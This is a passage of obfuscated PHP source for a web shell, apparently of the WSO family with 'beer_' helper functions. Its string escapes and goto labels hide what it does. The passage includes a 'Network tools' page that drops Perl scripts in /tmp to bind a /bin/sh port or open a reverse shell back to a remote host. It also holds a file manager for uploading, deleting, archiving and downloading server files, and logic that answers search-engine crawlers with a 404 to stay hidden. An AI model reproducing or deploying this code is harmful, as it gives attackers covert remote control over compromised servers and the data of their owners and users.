130\102\172\x59\126\x68\117\115\x46\x70\x58\x4e\107\71\126\145\130\x64\x36\123\x31\116\103\x4f\107\132\x44\121\155\x74\x68\x56\x31\126\x6e\x53\x57\164\117\x61\x47\112\165\125\x57\144\x69\122\62\170\66\132\105\144\x57\144\125\154\111\x51\x6e\132\x6a\x62\154\112\x6a\x59\155\x6c\x4a\x4e\x30\122\122\x63\104\x4e\150\122\x32\170\172\x57\154\x4e\156\145\105\164\124\121\152\144\105\125\x57\x39\x4b\x57\126\x64\117\x61\x6c\160\131\x51\152\x42\x4c\x52\125\x35\x51\x56\107\163\60\x63\61\126\x35\x61\172\144\105\125\127\x39\x4b\131\126\144\x5a\142\60\x6c\x54\132\x32\164\x6a\122\62\x78\162\x55\x46\144\x61\x64\x6d\116\164\143\63\x42\114\x55\60\111\x33\x52\106\106\x76\x53\153\x4e\x58\x55\156\102\141\x55\x30\x46\x70\125\124\112\x47\x64\127\x4a\x74\117\124\x42\112\122\61\x77\x61\x74\x59\x32\x31\172\x61\125\154\x48\142\107\61\x4a\121\62\144\157\x57\x6b\x64\127\142\127\106\130\116\x57\170\141\x51\60\x46\x72\131\60\144\x73\141\60\164\125\143\x30\65\x44\x5a\62\x74\x4b\131\152\x4e\x43\x62\107\x4a\160\121\x6c\x52\x57\x52\126\112\x4b\126\x47\x6c\63\141\x56\102\x44\127\x6b\x52\x55\x4d\x44\126\x50\123\127\160\x7a\124\x6b\116\156\x61\60\x70\151\115\60\x4a\x73\131\x6d\154\103\x56\x46\132\x46\125\x6c\102\127\x56\154\106\x7a\123\x57\157\x30\142\x56\x45\167\x4f\x55\x39\x55\x61\x55\153\x33\122\x46\106\x76\x53\153\x4e\x58\x4f\x58\x64\141\126\172\122\156\x56\124\106\123\x52\x56\x4a\x57\123\154\116\115\x51\x30\153\x72\123\x6d\164\117\x55\106\x52\162\116\x47\154\x50\144\172\102\114\x51\x31\106\x73\x62\107\126\x48\x56\155\x70\x4a\x51\x31\x4a\125\125\x30\x56\x57\x54\x56\122\x44\121\x6a\150\x6d\x51\60\x4a\x72\131\126\x64\126\x5a\62\x4e\111\x53\156\x42\x69\142\154\106\156\x55\124\101\x35\124\61\122\160\121\127\x6c\x52\x4d\x6b\x5a\61\132\x45\116\103\142\x47\x56\x48\x56\155\x70\x6b\127\106\112\163\123\125\x4e\123\126\106\116\106\126\153\61\x55\x52\156\150\x31\123\127\x70\x7a\124\x6b\116\156\141\x30\160\x5a\115\156\x68\x32\x59\172\112\x56\x5a\x31\x45\x77\117\x55\71\125\x61\156\116\117\x51\62\144\162\123\x6c\160\131\x61\x48\102\x6b\x51\60\x46\63\x54\63\143\167\x53\60\116\131\115\105\65\104\142\x6a\101\71"; echo "\x3c\x68\x31\x3e\116\x65\x74\167\x6f\162\153\40\164\x6f\157\154\163\74\57\150\x31\76\x3c\x64\x69\x76\40\x63\x6c\x61\x73\x73\x3d\143\x6f\x6e\164\145\x6e\164\76\12\x9\74\x66\x6f\x72\x6d\x20\x6e\x61\x6d\x65\75\47\156\146\x70\x27\x20\x6f\x6e\123\x75\142\x6d\x69\x74\75\42\x67\50\x6e\165\x6c\154\x2c\x6e\165\x6c\x6c\54\x27\x62\x70\160\47\54\x74\x68\151\x73\x2e\x70\x6f\x72\164\56\166\x61\154\x75\x65\x29\x3b\x72\145\164\x75\x72\156\x20\146\141\x6c\163\145\x3b\x22\76\xa\x9\74\163\160\x61\156\x3e\x42\151\x6e\x64\x20\x70\x6f\x72\164\40\164\x6f\x20\x2f\142\151\x6e\x2f\163\x68\40\x5b\160\145\162\x6c\x5d\74\x2f\163\160\x61\x6e\x3e\74\142\162\57\76\12\11\120\x6f\x72\x74\x3a\x20\74\151\156\x70\165\x74\x20\164\x79\160\x65\75\x27\x74\145\170\x74\x27\x20\156\141\155\x65\x3d\x27\x70\157\162\x74\x27\40\x76\x61\154\x75\x65\x3d\47\x33\x31\x33\x33\x37\47\76\40\74\x69\x6e\160\165\164\x20\164\171\160\145\75\163\x75\142\155\x69\x74\x20\166\x61\x6c\165\145\75\x27\x3e\76\x27\76\12\x9\x3c\57\146\157\x72\x6d\x3e\12\x9\74\146\157\162\x6d\40\x6e\x61\x6d\145\75\x27\156\146\x70\x27\40\x6f\156\123\x75\x62\155\x69\x74\75\42\147\50\x6e\165\154\x6c\x2c\x6e\165\x6c\154\54\x27\142\x63\x70\47\x2c\164\150\151\x73\x2e\x73\x65\162\166\x65\x72\56\166\141\154\x75\x65\54\x74\x68\x69\163\56\x70\x6f\x72\164\56\x76\141\x6c\165\x65\x29\x3b\162\145\164\x75\x72\x6e\x20\146\x61\154\163\x65\73\42\76\xa\x9\74\x73\160\141\x6e\x3e\x42\141\x63\x6b\55\x63\x6f\156\156\145\x63\x74\x20\40\133\160\145\x72\x6c\135\74\x2f\163\160\x61\156\76\74\x62\162\57\x3e\12\11\x53\145\x72\166\145\162\x3a\40\74\x69\x6e\160\x75\164\40\164\x79\x70\x65\x3d\47\164\145\170\164\47\40\x6e\141\155\145\x3d\47\x73\x65\162\166\x65\162\x27\40\x76\x61\154\x75\145\x3d\47" . $_SERVER["\122\105\115\x4f\x54\x45\x5f\x41\104\x44\x52"] . "\47\x3e\40\120\x6f\162\164\72\x20\x3c\x69\156\160\165\164\x20\x74\x79\x70\x65\x3d\47\x74\145\x78\x74\x27\x20\156\x61\155\x65\75\x27\x70\157\162\164\x27\x20\x76\x61\154\x75\x65\x3d\x27\x33\x31\x33\x33\x37\47\76\40\74\x69\156\x70\x75\x74\40\164\171\160\145\75\x73\165\142\155\x69\164\40\166\x61\154\165\145\75\47\x3e\76\47\x3e\xa\11\74\57\146\x6f\162\155\76\x3c\142\x72\x3e"; if (isset($_POST["\166\141\x74"])) { function cf($f, $t) { $w = @fopen($f, "\167") or @function_exists("\146\x69\154\145\x5f\x70\165\164\137\143\157\156\x74\145\x6e\164\x73"); if ($w) { @fwrite($w, base64_decode(base64_decode($t))); @fclose($w); } } if ($_POST["\166\x61\164"] == "\142\160\160") { cf("\57\x74\155\160\x2f\x62\x70\x2e\160\154", $bind_port_p); $out = beer_Ex("\160\x65\x72\154\40\57\x74\x6d\x70\x2f\x62\160\x2e\x70\154\x20" . $_POST["\x77\141\x74"] . "\40\x31\76\57\144\x65\x76\57\156\x75\x6c\154\40\62\76\x26\x31\x20\x26"); sleep(1); echo "\74\x70\162\x65\40\143\154\141\x73\163\75\x6d\154\x31\x3e{$out}\xa" . beer_Ex("\160\163\x20\x61\x75\x78\x20\174\40\x67\x72\x65\160\x20\x62\160\56\160\154") . "\x3c\57\160\162\145\76"; unlink("\57\x74\x6d\160\57\142\160\56\x70\154"); } if ($_POST["\166\141\x74"] == "\x62\143\x70") { cf("\57\164\155\x70\x2f\142\x63\x2e\160\x6c", $back_connect_p); $out = beer_Ex("\160\x65\x72\154\x20\57\164\x6d\160\x2f\142\x63\x2e\x70\154\40" . $_POST["\x77\141\x74"] . "\x20" . $_POST["\x78\x61\164"] . "\40\61\x3e\x2f\x64\x65\x76\x2f\156\x75\154\154\40\62\76\46\x31\x20\x26"); sleep(1); echo "\x3c\160\x72\x65\x20\143\x6c\x61\x73\x73\75\155\154\61\76{$out}\12" . beer_Ex("\160\163\40\x61\165\x78\40\174\x20\x67\162\145\x70\x20\x62\143\x2e\x70\154") . "\74\x2f\x70\x72\145\76"; unlink("\x2f\x74\155\x70\x2f\142\x63\56\x70\154"); } } echo "\74\x2f\144\151\x76\x3e"; beer_Footer(); } goto iACqi; savMC: if (!empty($_SERVER["\110\x54\124\x50\137\x55\x53\105\x52\137\x41\x47\x45\x4e\124"])) { $userAgents = array("\115\x53\x4e\102\157\x74", "\x69\141\x5f\x61\162\143\x68\x69\x76\x65\162", "\131\141\x6e\x64\x65\170", "\x52\141\x6d\142\x6c\x65\x72", "\107\x6f\157\147\x6c\x65"); if (preg_match("\x2f" . implode("\174", $userAgents) . "\57\x69", $_SERVER["\110\x54\x54\x50\137\125\x53\105\122\x5f\x41\x47\105\116\x54"])) { header("\110\x54\x54\x50\x2f\x31\x2e\x30\x20\64\60\64\x20\x4e\157\164\40\x46\x6f\x75\156\144"); die; } } goto Kk9z5; l8fZe: $default_use_ajax = true; goto hp9Oh; ZQ7ZC: if (!$safe_mode) { error_reporting(0); } goto bt0zZ; brDO3: function actionFilesMan() { if (!empty($_COOKIE["\146"])) { $_COOKIE["\x66"] = @unserialize($_COOKIE["\x66"]); } if (!empty($_POST["\166\141\x74"])) { switch ($_POST["\x76\x61\164"]) { case "\165\x70\x6c\157\141\144\106\151\x6c\x65": if (!@move_uploaded_file($_FILES["\146"]["\x74\155\160\137\156\141\x6d\x65"], $_FILES["\x66"]["\156\x61\x6d\145"])) { echo "\x43\141\156\47\164\40\165\x70\154\x6f\141\x64\x20\146\151\x6c\x65\x21"; } break; case "\x6d\x6b\x64\151\x72": if (!@mkdir($_POST["\x77\141\164"])) { echo "\103\x61\x6e\x27\164\40\x63\162\145\x61\x74\145\40\x6e\145\167\x20\x64\x69\x72"; } break; case "\x64\x65\154\x65\164\x65": function deleteDir($path) { $path = substr($path, -1) == "\x2f" ? $path : $path . "\57"; $dh = opendir($path); while (($item = readdir($dh)) !== false) { $item = $path . $item; if (basename($item) == "\x2e\56" || basename($item) == "\x2e") { continue; } $type = filetype($item); if ($type == "\144\151\162") { deleteDir($item); } else { @unlink($item); } } closedir($dh); @rmdir($path); } if (is_array(@$_POST["\146"])) { foreach ($_POST["\146"] as $f) { if ($f == "\56\56") { continue; } $f = urldecode($f); if (is_dir($f)) { deleteDir($f); } else { @unlink($f); } } } break; case "\x70\x61\163\164\x65": if ($_COOKIE["\141\143\164"] == "\x63\x6f\160\171") { function copy_paste($c, $s, $d) { if (is_dir($c . $s)) { mkdir($d . $s); $h = @opendir($c . $s); while (($f = @readdir($h)) !== false) { if ($f != "\x2e" and $f != "\56\x2e") { copy_paste($c . $s . "\x2f", $f, $d . $s . "\x2f"); } } } elseif (is_file($c . $s)) { @copy($c . $s, $d . $s); } } foreach ($_COOKIE["\146"] as $f) { copy_paste($_COOKIE["\143"], $f, $GLOBALS["\x63\x77\144"]); } } elseif ($_COOKIE["\x61\143\164"] == "\155\x6f\x76\145") { function move_paste($c, $s, $d) { if (is_dir($c . $s)) { mkdir($d . $s); $h = @opendir($c . $s); while (($f = @readdir($h)) !== false) { if ($f != "\x2e" and $f != "\x2e\x2e") { copy_paste($c . $s . "\x2f", $f, $d . $s . "\x2f"); } } } elseif (@is_file($c . $s)) { @copy($c . $s, $d . $s); } } foreach ($_COOKIE["\146"] as $f) { @rename($_COOKIE["\143"] . $f, $GLOBALS["\143\x77\x64"] . $f); } } elseif ($_COOKIE["\x61\143\164"] == "\x7a\x69\x70") { if (class_exists("\132\x69\x70\101\162\143\150\x69\x76\145")) { $zip = new ZipArchive(); if ($zip->open($_POST["\167\141\164"], 1)) { chdir($_COOKIE["\x63"]); foreach ($_COOKIE["\146"] as $f) { if ($f == "\56\x2e") { continue; } if (@is_file($_COOKIE["\143"] . $f)) { $zip->addFile($_COOKIE["\143"] . $f, $f); } elseif (@is_dir($_COOKIE["\143"] . $f)) { $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f . "\57", FilesystemIterator::SKIP_DOTS)); foreach ($iterator as $key => $value) { $zip->addFile(realpath($key), $key); } } } chdir($GLOBALS["\143\167\144"]); $zip->close(); } } } elseif ($_COOKIE["\141\143\164"] == "\165\x6e\x7a\x69\160") { if (class_exists("\x5a\x69\160\101\x72\x63\150\151\x76\x65")) { $zip = new ZipArchive(); foreach ($_COOKIE["\x66"] as $f) { if ($zip->open($_COOKIE["\143"] . $f)) { $zip->extractTo($GLOBALS["\143\167\x64"]); $zip->close(); } } } } elseif ($_COOKIE["\141\x63\x74"] == "\x74\x61\x72") { chdir($_COOKIE["\x63"]); $_COOKIE["\x66"] = array_map("\x65\163\143\141\x70\x65\x73\150\x65\154\x6c\x61\162\147", $_COOKIE["\x66"]); beer_Ex("\x74\x61\x72\40\x63\146\x7a\166\x20" . escapeshellarg($_POST["\x77\x61\164"]) . "\x20" . implode("\40", $_COOKIE["\x66"])); chdir($GLOBALS["\143\167\x64"]); } unset($_COOKIE["\x66"]); setcookie("\146", '', time() - 3600); break; default: if (!empty($_POST["\166\x61\164"])) { BEER_setcookie("\x61\x63\164", $_POST["\166\141\164"]); BEER_setcookie("\146", serialize(@$_POST["\146"])); BEER_setcookie("\x63", @$_POST["\x63\141\x74"]); } break; } } beer_Header(); echo "\x3c\150\x31\x3e\106\x69\x6c\145\40\x6d\141\x6e\x61\x67\145\x72\74\x2f\150\x31\76\x3c\x64\x69\x76\x20\143\x6c\x61\x73\x73\75\143\157\156\164\145\x6e\164\x3e\74\x73\x63\x72\x69\x70\164\x3e\166\141\x74\137\75\167\x61\x74\137\x3d\170\141\x74\137\75\42\x22\x3b\74\57\163\143\162\151\160\164\76"; $dirContent = beer_Scandir(isset($_POST["\143\141\164"]) ? $_POST["\x63\141\x74"] : $GLOBALS["\x63\167\x64"]); if ($dirContent === false) { echo "\103\141\156\x27\164\x20\157\160\x65\x6e\40\164\150\x69\x73\x20\146\x6f\154\x64\145\162\41"; beer_Footer(); return; } global $sort; $sort = array("\156\141\x6d\x65", 1); if (!empty($_POST["\166\141\164"])) { if (preg_match("\41\163\x5f\x28\x5b\x41\x2d\x7a\135\x2b\x29\x5f\50\x5c\x64\173\x31\175\x29\41", $_POST["\x76\x61\x74"], $match)) { $sort = array($match[1], (int) $match[2]); } } echo "\74\x73\143\x72\x69\160\x74\76\12\x9\146\x75\x6e\x63\164\151\x6f\156\x20\163\141\x28\51\x20\173\12\11\11\146\157\162\x28\151\75\x30\73\151\x3c\x64\x2e\x66\151\154\x65\163\x2e\145\154\145\x6d\x65\x6e\x74\163\x2e\154\x65\x6e\147\x74\x68\x3b\x69\x2b\53\x29\12\11\11\11\x69\146\50\144\56\146\151\154\145\163\56\x65\x6c\x65\x6d\x65\156\x74\163\x5b\x69\135\x2e\x74\x79\x70\x65\x20\75\75\x20\47\143\x68\x65\x63\x6b\142\x6f\x78\47\51\xa\11\x9\11\11\x64\x2e\x66\151\154\145\x73\x2e\145\154\145\x6d\x65\156\x74\x73\x5b\151\135\56\143\x68\145\x63\x6b\145\x64\x20\x3d\x20\144\x2e\146\x69\x6c\145\x73\x2e\145\x6c\x65\155\x65\156\164\163\x5b\x30\135\x2e\x63\150\145\143\153\145\144\x3b\12\x9\x7d\12\74\57\163\143\162\151\160\164\x3e\12\74\x74\x61\x62\154\x65\x20\167\151\x64\x74\x68\x3d\x27\61\60\x30\x25\x27\x20\143\154\x61\x73\x73\75\47\x6d\x61\151\x6e\47\x20\143\145\154\x6c\163\160\141\143\151\156\x67\x3d\x27\x30\x27\x20\143\x65\x6c\x6c\x70\x61\x64\144\x69\156\147\x3d\x27\x32\x27\76\xa\74\146\x6f\162\x6d\x20\x6e\x61\x6d\145\x3d\146\151\x6c\x65\163\x20\x6d\x65\164\150\x6f\144\75\160\x6f\163\164\76\74\x74\162\x3e\74\x74\x68\40\167\151\144\164\150\75\x27\61\x33\x70\170\x27\76\74\x69\x6e\x70\x75\x74\40\x74\171\160\145\x3d\x63\x68\145\143\x6b\x62\x6f\170\40\157\x6e\143\x6c\151\143\x6b\75\x27\x73\141\50\x29\x27\x20\x63\154\x61\163\163\75\x63\x68\x6b\x62\x78\76\74\57\x74\x68\x3e\x3c\x74\150\x3e\74\141\40\x68\162\145\146\x3d\47\43\47\40\157\x6e\x63\x6c\x69\x63\x6b\75\x27\x67\50\x22\x46\151\154\x65\163\x4d\x61\156\x22\x2c\x6e\x75\154\x6c\x2c\x22\163\137\156\141\x6d\x65\x5f" . ($sort[1] ? 0 : 1) . "\x22\51\47\76\x4e\x61\155\x65\74\57\x61\x3e\74\57\164\x68\76\74\x74\150\76\x3c\141\40\150\162\x65\146\75\47\x23\47\40\157\x6e\x63\154\151\143\153\x3d\x27\147\50\42\x46\x69\x6c\x65\163\x4d\x61\x6e\42\54\x6e\165\154\154\x2c\x22\163\137\x73\x69\x7a\x65\x5f" . ($sort[1] ? 0 : 1) . "\x22\x29\x27\76\123\151\172\x65\74\57\x61\x3e\x3c\x2f\x74\150\x3e\x3c\x74\x68\x3e\x3c\141\x20\150\162\x65\146\x3d\x27\43\x27\x20\157\x6e\143\154\x69\143\153\75\x27\x67\x28\x22\106\151\x6c\145\x73\x4d\141\156\x22\x2c\x6e\x75\x6c\154\54\x22\163\137\155\157\x64\151\x66\171\x5f" . ($sort[1] ? 0 : 1) . "\x22\51\47\x3e\115\157\x64\x69\x66\171\74\x2f\141\76\74\x2f\164\x68\x3e\x3c\x74\150\x3e\117\167\x6e\145\162\x2f\107\x72\x6f\x75\x70\74\57\x74\x68\x3e\74\164\x68\76\x3c\141\x20\150\162\145\x66\x3d\47\43\47\x20\157\156\x63\x6c\151\x63\153\75\47\147\x28\42\106\151\x6c\x65\x73\x4d\141\156\x22\54\x6e\x75\154\x6c\54\x22\163\x5f\160\x65\x72\155\163\137" . ($sort[1] ? 0 : 1) . "\x22\51\x27\76\120\145\162\155\x69\x73\163\x69\x6f\x6e\x73\74\x2f\141\76\74\57\164\x68\x3e\74\164\150\76\x41\x63\164\151\157\156\163\74\x2f\164\150\x3e\x3c\x2f\164\x72\76"; $dirs = $files = array(); $n = count($dirContent); for ($i = 0; $i < $n; $i++) { $ow = @posix_getpwuid(@fileowner($dirContent[$i])); $gr = @posix_getgrgid(@filegroup($dirContent[$i])); $tmp = array("\156\x61\x6d\145" => $dirContent[$i], "\x70\x61\164\x68" => $GLOBALS["\x63\x77\144"] . $dirContent[$i], "\155\157\x64\x69\x66\x79" => date("\x59\x2d\155\55\x64\40\110\72\151\x3a\163", @filemtime($GLOBALS["\143\167\x64"] . $dirContent[$i])), "\160\145\162\155\x73" => beer_PermsColor($GLOBALS["\x63\167\144"] . $dirContent[$i]), "\163\x69\172\x65" => @filesize($GLOBALS["\x63\x77\144"] . $dirContent[$i]), "\157\x77\156\x65\162" => $ow["\x6e\x61\155\145"] ? $ow["\156\141\x6d\x65"] : @fileowner($dirContent[$i]), "\147\x72\157\x75\160" => $gr["\156\x61\x6d\145"] ? $gr["\156\141\x6d\145"] : @filegroup($dirContent[$i])); if (@is_file($GLOBALS["\143\167\144"] . $dirContent[$i])) { $files[] = array_merge($tmp, array("\164\171\x70\145" => "\146\x69\x6c\145")); } elseif (@is_link($GLOBALS["\x63\167\x64"] . $dirContent[$i])) { $dirs[] = array_merge($tmp, array("\x74\171\x70\145" => "\154\151\156\153", "\154\x69\x6e\x6b" => readlink($tmp["\x70\141\164\x68"]))); } elseif (@is_dir($GLOBALS["\x63\167\144"] . $dirContent[$i])) { $dirs[] = array_merge($tmp, array("\164\x79\x70\145" => "\x64\x69\x72")); } } $GLOBALS["\163\x6f\x72\x74"] = $sort; function beer_Cmp($a, $b) { if ($GLOBALS["\163\x6f\x72\164"][0] != "\163\x69\x7a\145") { return strcmp(strtolower($a[$GLOBALS["\163\x6f\162\x74"][0]]), strtolower($b[$GLOBALS["\163\157\x72\164"][0]])) * ($GLOBALS["\x73\x6f\162\164"][1] ? 1 : -1); } else { return ($a["\x73\x69\x7a\x65"] < $b["\x73\151\172\145"] ? -1 : 1) * ($GLOBALS["\x73\x6f\162\164"][1] ? 1 : -1); } } usort($files, "\142\145\x65\x72\137\x43\x6d\160"); usort($dirs, "\x62\145\145\x72\x5f\103\x6d\160"); $files = array_merge($dirs, $files); $l = 0; foreach ($files as $f) { echo "\x3c\164\x72" . ($l ? "\x20\143\154\141\x73\x73\75\x6c\61" : '') . "\76\x3c\x74\144\76\x3c\151\x6e\160\165\164\x20\164\171\160\x65\75\x63\150\145\143\x6b\142\157\170\40\x6e\141\155\145\75\x22\146\133\135\x22\x20\x76\141\x6c\x75\145\x3d\42" . urlencode($f["\x6e\141\x6d\x65"]) . "\42\x20\x63\154\141\x73\163\75\x63\150\x6b\142\170\x3e\74\57\x74\x64\76\74\x74\x64\x3e\x3c\x61\40\x68\x72\x65\146\75\43\x20\x6f\x6e\x63\154\151\143\x6b\x3d\x22" . ($f["\164\x79\160\x65"] == "\146\151\154\x65" ? "\x67\x28\47\106\x69\x6c\145\x73\x54\x6f\x6f\154\163\47\x2c\x6e\165\154\x6c\54\x27" . urlencode($f["\x6e\x61\155\145"]) . "\47\x2c\40\47\x76\x69\145\167\x27\x29\x22\x3e" . htmlspecialchars($f["\x6e\141\x6d\x65"]) : "\x67\50\x27\x46\x69\154\145\x73\115\141\x6e\x27\x2c\x27" . $f["\160\x61\x74\x68"] . "\47\x29\x3b\42\40" . (empty($f["\x6c\x69\x6e\153"]) ? '' : "\164\151\164\x6c\145\75\47{$f["\x6c\x69\156\x6b"]}\47") . "\x3e\x3c\142\76\x5b\x20" . htmlspecialchars($f["\156\x61\x6d\x65"]) . "\40\x5d\x3c\x2f\142\76") . "\74\x2f\x61\x3e\74\x2f\x74\x64\76\74\x74\144\x3e" . ($f["\x74\x79\x70\x65"] == "\146\x69\x6c\145" ? beer_ViewSize($f["\163\151\x7a\x65"]) : $f["\x74\171\x70\145"]) . "\74\x2f\164\x64\76\x3c\164\x64\x3e" . $f["\x6d\157\x64\x69\146\171"] . "\74\57\x74\x64\76\74\x74\144\76" . $f["\x6f\167\156\x65\x72"] . "\57" . $f["\147\162\157\165\x70"] . "\x3c\57\x74\x64\76\x3c\164\144\76\x3c\x61\x20\150\x72\145\x66\x3d\x23\x20\x6f\156\x63\154\x69\143\x6b\75\x22\x67\50\47\106\151\154\145\x73\x54\157\x6f\154\x73\x27\54\x6e\165\x6c\154\54\47" . urlencode($f["\x6e\141\155\x65"]) . "\x27\54\x27\x63\150\x6d\157\x64\47\x29\42\x3e" . $f["\160\145\x72\x6d\163"] . "\x3c\57\164\x64\x3e\74\164\x64\76\x3c\141\x20\x68\162\x65\x66\75\x22\x23\x22\40\157\x6e\143\x6c\151\x63\x6b\75\42\147\x28\x27\x46\151\154\x65\x73\x54\157\157\154\x73\47\54\156\x75\x6c\x6c\54\x27" . urlencode($f["\x6e\141\155\145"]) . "\47\54\x20\47\x72\145\156\141\155\x65\47\x29\x22\76\122\74\57\141\x3e\x20\74\x61\x20\150\x72\x65\x66\75\42\43\x22\40\x6f\x6e\143\154\151\x63\153\x3d\42\x67\x28\47\106\151\154\145\x73\x54\x6f\157\154\x73\47\54\156\x75\x6c\x6c\54\x27" . urlencode($f["\x6e\x61\x6d\x65"]) . "\47\54\x20\47\x74\x6f\x75\143\150\47\51\42\x3e\124\74\57\141\x3e" . ($f["\164\x79\x70\x65"] == "\x66\151\154\x65" ? "\40\74\141\40\150\x72\x65\146\x3d\x22\43\42\40\x6f\x6e\143\154\151\143\153\75\x22\147\50\47\x46\151\154\x65\x73\x54\157\157\154\163\47\54\156\165\154\x6c\x2c\47" . urlencode($f["\x6e\141\155\x65"]) . "\x27\54\x20\x27\145\x64\x69\x74\x27\51\x22\76\105\74\x2f\141\76\40\x3c\141\x20\x68\162\145\x66\x3d\x22\43\42\x20\x6f\156\143\154\151\x63\x6b\x3d\x22\147\x28\47\106\151\x6c\145\x73\124\x6f\157\154\163\47\54\156\165\x6c\154\x2c\47" . urlencode($f["\156\141\x6d\145"]) . "\x27\x2c\40\47\x64\157\x77\156\x6c\157\141\144\47\51\x22\76\104\x3c\x2f\x61\x3e" : '') . "\x3c\57\164\x64\76\x3c\x2f\164\x72\76"; $l = $l ? 0 : 1; } echo "\74\164\162\76\74\164\144\40\x63\x6f\154\163\x70\x61\x6e\x3d\x37\76\xa\x9\x3c\151\x6e\160\165\164\40\164\171\x70\x65\x3d\x68\151\144\144\x65\x6e\40\156\141\x6d\x65\x3d\x61\40\x76\141\x6c\165\145\75\x27\106\151\x6c\x65\x73\115\x61\156\47\76\12\x9\74\151\x6e\x70\x75\x74\40\164\171\x70\x65\x3d\150\x69\x64\144\x65\x6e\x20\x6e\x61\x6d\145\75\x63\x20\166\141\x6c\x75\145\75\47" . htmlspecialchars($GLOBALS["\143\x77\x64"]) . "\47\76\xa\11\x3c\x69\156\160\x75\164\40\x74\x79\x70\x65\x3d\150\x69\144\144\x65\x6e\40\x6e\x61\155\145\x3d\x63\x73\145\164\40\x76\x61\x6c\165\145\x3d\x27" . (isset($_POST["\143\x73\x65\164"]) ? $_POST["\143\163\x65\x74"] : '') . "\47\x3e\xa\11\x3c\163\145\154\145\143\x74\x20\156\141\x6d\145\x3d\x27\x76\141\x74\47\x3e\74\157\160\x74\151\x6f\156\40\166\141\154\165\145\75\x27\x63\x6f\x70\171\47\x3e\x43\x6f\x70\x79\x3c\x2f\x6f\160\x74\151\x6f\x6e\76\74\157\160\x74\151\157\x6e\x20\x76\141\x6c\165\145\x3d\47\x6d\x6f\x76\145\x27\x3e\115\x6f\x76\145\74\x2f\x6f\160\164\x69\x6f\156\76\x3c\157\160\164\151\x6f\156\x20\166\x61\154\x75\x65\75\x27\x64\145\154\x65\x74\145\47\76\104\x65\x6c\x65\x74\x65\x3c\57\x6f\160\164\x69\157\156\76"; if (class_exists("\132\151\x70\101\162\143\150\x69\x76\x65")) { echo "\74\x6f\x70\x74\x69\x6f\x6e\x20\x76\141\154\x75\x65\75\x27\172\x69\x70\x27\76\103\157\x6d\x70\x72\x65\x73\163\40\50\x7a\x69\x70\x29\x3c\x2f\157\160\x74\151\157\156\76\74\x6f\160\x74\151\x6f\156\x20\x76\x61\x6c\165\145\75\47\x75\156\172\x69\160\47\76\125\x6e\143\157\155\160\x72\x65\x73\163\x20\50\172\x69\x70\x29\x3c\x2f\157\x70\x74\151\157\x6e\x3e"; } echo "\74\x6f\160\x74\x69\x6f\156\x20\x76\x61\x6c\x75\x65\x3d\x27\x74\141\x72\x27\76\x43\x6f\155\160\162\145\163\x73\40\50\x74\x61\162\x2e\147\172\x29\74\57\x6f\x70\x74\151\x6f\156\x3e"; if (!empty($_COOKIE["\141\143\164"]) && @count($_COOKIE["\x66"])) { echo "\x3c\157\x70\164\151\157\156\40\166\141\154\165\145\75\47\x70\141\163\x74\x65\47\76\x50\141\x73\164\x65\40\57\x20\x43\157\x6d\160\x72\x65\x73\x73\x3c\57\157\x70\x74\x69\157\x6e\76"; } echo "\74\57\163\145\154\x65\x63\164\x3e\x26\156\142\163\x70\73"; if (!empty($_COOKIE["\x61\143\x74"]) && @count($_COOKIE["\x66"]) && ($_COOKIE["\x61\143\x74"] == "\172\x69\x70" || $_COOKIE["\141\x63\x74"] == "\164\x61\162")) { echo "\146\151\154\145\40\156\141\155\x65\72\x20\74\x69\x6e\160\165\x74\x20\x74\171\x70\x65\x3d\x74\145\170\164\x20\x6e\141\155\145\75\x77\141\x74\x20\166\x61\x6c\x75\x65\x3d\47\x62\145\145\x72\x5f\x5f" . date("\131\155\x64\x5f\110\x69\x73") . "\56" . ($_COOKIE["\141\143\164"] == "\172\151\x70" ? "\x7a\x69\x70" : "\x74\141\x72\x2e\x67\x7a") . "\x27\76\46\156\x62\163\160\73"; } echo "\74\x69\156\x70\165\x74\x20\x74\171\x70\x65\75\47\x73\165\x62\x6d\x69\164\47\40\x76\x61\154\165\145\x3d\47\76\x3e\x27\76\x3c\57\164\144\76\x3c\x2f\164\x72\x3e\x3c\57\x66\157\x72\x6d\76\74\57\164\x61\x62\x6c\x65\x3e\x3c\57\x64\x69\166\x3e"; beer_Footer(); } goto QmPpR; BIykg: if ($os == "\x77\x69\156") { $home_cwd = str_replace("\134", "\40\x2f\40", $home_cwd); $cwd = str_replace("\x5c", "\40\57\40", $cwd); } goto bDLDc; LMh48: @ini_set("\x6c\157\147\x5f\145\x72\x72\157\162\163", 0); goto CGLQ_; pZbar: function actionFilesTools() { if (isset($_POST["\x76\141\164"])) { $_POST["\166\141\x74"] = urldecode($_POST["\166\141\164"]); } if (@$_POST["\167\x61\164"] == "\144\157\167\x6e\154\157\x61\x64") { if (@is_file($_POST["\166\x61\164"]) && @is_readable($_POST["\166\141\x74"])) { ob_start("\x6f\142\137\147\x7a\x68\141\156\x64\154\145\x72", 4096); header("\x43\x6f\156\164\x65\x6e\164\x2d\x44\x69\163\160\x6f\163\x69\164\x69\x6f\x6e\72\x20\141\164\x74\x61\143\150\155\145\x6e\x74\x3b\x20\146\x69\154\x65\x6e\x61\155\145\75" . basename($_POST["\166\141\x74"])); if (function_exists("\x6d\151\x6d\145\137\143\157\156\164\x65\156\164\137\164\171\160\145")) { $type = @mime_content_type($_POST["\166\141\164"]); header("\x43\x6f\x6e\x74\145\156\x74\55\x54\x79\160\145\x3a\x20" . $type); } else { header("\103\157\156\164\145\156\x74\55\x54\171\x70\x65\x3a\x20\141\x70\x70\x6c\x69\x63\x61\164\x69\x6f\x6e\57\157\x63\164\145\x74\55\163\x74\162\x65\x61\x6d"); } $fp = @fopen($_POST["\166\141\164"], "\x72"); if ($fp) { while (!@feof($fp)) { echo @fread($fp, 1024); } fclose($fp); } } die; } if (@$_POST["\167\x61\164"] == "\x6d\153\146\x69\x6c\145") { if (!file_exists($_POST["\166\x61\x74"])) { $fp = @fopen($_POST["\166\141\164"], "\x77"); if ($fp) { $_POST["\167\141\164"] = "\145\x64\x69\x74"; fclose($fp); } } } beer_Header(); echo "\x3c\150\61\76\106\151\x6c\145\x20\164\x6f\157\x6c\163\x3c\57\150\x31\76\x3c\144\x69\166\x20\143\x6c\141\163\163\75\x63\x6f\x6e\164\145\x6e\164\76"; if (!file_exists(@$_POST["\x76\141\x74"])) { echo "\106\151\154\145\40\156\157\164\x20\x65\x78\x69\x73\x74\x73"; beer_Footer(); return; } $uid = @posix_getpwuid(@fileowner($_POST["\166\141\164"])); if (!$uid) { $uid["\156\141\x6d\145"] = @fileowner($_POST["\x76\x61\164"]); 